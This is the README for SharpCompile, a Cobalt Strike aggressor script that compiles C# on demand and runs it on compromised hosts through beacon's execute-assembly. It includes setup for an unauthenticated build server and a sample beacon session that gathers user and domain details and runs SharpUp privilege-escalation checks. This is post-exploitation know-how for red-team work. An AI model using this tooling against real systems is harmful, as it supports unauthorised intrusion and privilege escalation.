SharpCompile

SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in real-time. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing using beacon’s ‘execute-assembly’ in seconds.

Download

git clone https://github.com/SpiderLabs/SharpCompile.git

Usage

Run server component elevated on a Windows machine (Your builder box) to listen on 0.0.0.0. This web server is intended to only be visible to operator systems (running the Cobalt Strike client) so is unauthenticated. Firewall this off and take advantage of SSL by providing ‘cert.cer’ alongside the server binary.

SharpCompileServer.exe [Optional: Full CSC Path (Default: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe)] [Optional: Port (Default: 80 or 443 if 'cert.cer' present)]

Your Cobalt Strike client then tasks the server component to build an assembly when required. This simply requires ‘curl’ by default so should work out the box on OS X and Linux. You will likely need to tweak the .cna to make it work on Windows calling a ‘curl.exe’ etc.

Modify the config section at the top of ‘SharpCompile.cna’ and load into Cobalt Strike. This exposes SharpCompile in the following ways:

sharp-exec alias:

beacon> sharp-exec Console.WriteLine(String.Format("Username: {0}\nDomain: {1}",Environment.UserName, Environment.UserDomainName));

[*] Tasked beacon to run .NET program: sharpcompile_38692.exe

[+] host called home, sent: 109611 bytes

[+] received output:

Username: Administrator

Domain: EVILCORP

SharpCompile beacon menu:

Right hand click a beacon:Select the .cs you want to compile and execute:

In the below example we compile SharpUp and run it with an ‘audit’ argument:

[*] Tasked beacon to run .NET program: sharpcompile_98542.exe audit

[+] host called home, sent: 133173 bytes

[+] received output:



=== SharpUp: Running Privilege Escalation Checks ===



[*] Already in high integrity, no need to privesc!



[*] Audit mode: running all checks anyway.





=== Modifiable Services ===



---snip---

Note: The version of .NET Framework csc.exe you specify for server component matters when compiling code that needs a specific version. This process does not give any feedback on a compilation, so if the code does not compile you will likely get an error in Cobalt Strike saying invalid assembly.

Authors

• David Middlehurst – Twitter- @dtmsecurity

Copyright (C) 2018 Trustwave Holdings, Inc.

Source: https://github.com/SpiderLabs/